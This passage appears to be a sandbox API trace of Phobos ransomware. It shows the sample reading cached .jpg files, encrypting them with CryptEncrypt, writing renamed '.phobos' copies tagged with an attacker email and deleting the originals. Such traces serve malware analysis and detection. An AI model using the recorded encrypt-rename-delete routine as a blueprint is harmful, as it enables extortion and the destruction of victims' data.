pdwDataLen=0x2f4fc48*=0x840, dwBufLen=0x840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x840) returned 1 [0175.221] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x840, lpOverlapped=0x0) returned 1 [0175.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.244] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.245] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.245] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.245] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.245] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.245] CloseHandle (hObject=0x190) returned 1 [0175.245] CloseHandle (hObject=0x158) returned 1 [0175.245] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg")) returned 1 [0175.246] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.247] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2260) returned 1 [0175.247] CloseHandle (hObject=0x158) returned 1 [0175.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg")) returned 0x2020 [0175.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.248] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.248] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8d4, lpOverlapped=0x0) returned 1 [0175.265] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8e0) returned 1 [0175.265] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8e0, lpOverlapped=0x0) returned 1 [0175.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.266] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.266] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.266] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.266] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.266] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.266] CloseHandle (hObject=0x158) returned 1 [0175.266] CloseHandle (hObject=0x190) returned 1 [0175.266] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe97o8[1].jpg")) returned 1 [0175.267] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.268] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1760) returned 1 [0175.268] CloseHandle (hObject=0x190) returned 1 [0175.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg")) returned 0x2020 [0175.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.269] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.269] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.270] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.270] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6e0, lpOverlapped=0x0) returned 1 [0175.298] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6f0) returned 1 [0175.298] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6f0, lpOverlapped=0x0) returned 1 [0175.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.299] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.299] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.299] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.299] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.299] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.299] CloseHandle (hObject=0x190) returned 1 [0175.299] CloseHandle (hObject=0x158) returned 1 [0175.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbe9wst[1].jpg")) returned 1 [0175.301] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.302] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2233) returned 1 [0175.302] CloseHandle (hObject=0x158) returned 1 [0175.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg")) returned 0x2020 [0175.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.302] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.303] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.303] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.303] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8b9, lpOverlapped=0x0) returned 1 [0175.743] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8c0, dwBufLen=0x8c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8c0) returned 1 [0175.743] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8c0, lpOverlapped=0x0) returned 1 [0175.744] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0175.744] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.744] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.744] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.744] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.744] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.744] CloseHandle (hObject=0x158) returned 1 [0175.744] CloseHandle (hObject=0x190) returned 1 [0175.745] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbechle[1].jpg")) returned 1 [0175.753] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.753] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2427) returned 1 [0175.753] CloseHandle (hObject=0x190) returned 1 [0175.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg")) returned 0x2020 [0175.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.754] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.754] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.754] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.754] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x97b, lpOverlapped=0x0) returned 1 [0175.837] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980, dwBufLen=0x980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980) returned 1 [0175.837] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x980, lpOverlapped=0x0) returned 1 [0175.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0175.838] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.838] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.838] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.838] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.839] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.839] CloseHandle (hObject=0x190) returned 1 [0175.839] CloseHandle (hObject=0x158) returned 1 [0175.839] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedoqv[1].jpg")) returned 1 [0175.843] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.844] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1744) returned 1 [0175.844] CloseHandle (hObject=0x158) returned 1 [0175.844] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedtww[1].jpg")) returned 0x2020 [0175.844] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 